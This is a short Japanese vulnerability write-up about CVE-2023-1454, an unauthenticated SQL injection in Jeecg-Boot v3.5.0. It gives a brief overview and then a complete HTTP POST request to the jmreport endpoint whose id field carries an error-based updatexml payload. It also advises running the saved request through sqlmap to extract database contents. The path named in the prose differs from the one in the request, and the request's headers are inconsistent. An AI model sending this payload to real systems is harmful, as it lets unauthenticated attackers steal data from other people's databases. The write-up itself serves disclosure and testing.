
CVE-2023-1454脆弱性検出スクリプト
CVE-2023-1454脆弱性検出スクリプト
この文書は参考用です。無断で記事内の技術資料やツールを使用して、いかなるコンピュータシステムにも侵入行為を行わないでください。 本書に記載された情報を利用して生じた直接的または間接的な結果や損害については、すべて利用者自身が責任を負うものとします。
概要 Jeecg-Bootは、コード生成器ベースのローコード開発プラットフォームです。コード生成器、テンプレートエンジン、権限管理、データディクショナリ、データインポート/エクスポートなどの一連の機能を提供し、開発者がエンタープライズアプリケーションを迅速に構築するのに役立ちます。
脆弱性の概要 エンタープライズWebアプリケーション向けのJavaローコードプラットフォームJeecg-Boot(v3.5.0)は、jimureport-spring-boot-starter-1.5.6.jarを使用しています。Jeecg-Bootは特殊文字のフィルタリングに欠陥があり、フロントエンドがVue3のv3.5.0バージョンにおいて、Jeecgに認証なしのSQLインジェクションが存在します。脆弱性は/querySqlパスが呼び出された際に、idパラメータでSQLが適切に処理されていないことに起因し、これにより直接エラーベースのインジェクションが可能です。認証されていないリモート攻撃者は、特別に細工された文字列を構築することで、最終的にターゲットデータベースの機密情報を取得できます。
影響を受けるバージョン 影響を受けるバージョン:Jeecg-Boot = v3.5.0
パケットをtxtとして保存し、sqlmapを使用してデータを取得できます
POST /jmreport/qurestSql HTTP/1.1
Host: xxx.xxx.xxx
Content-Length: 0
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}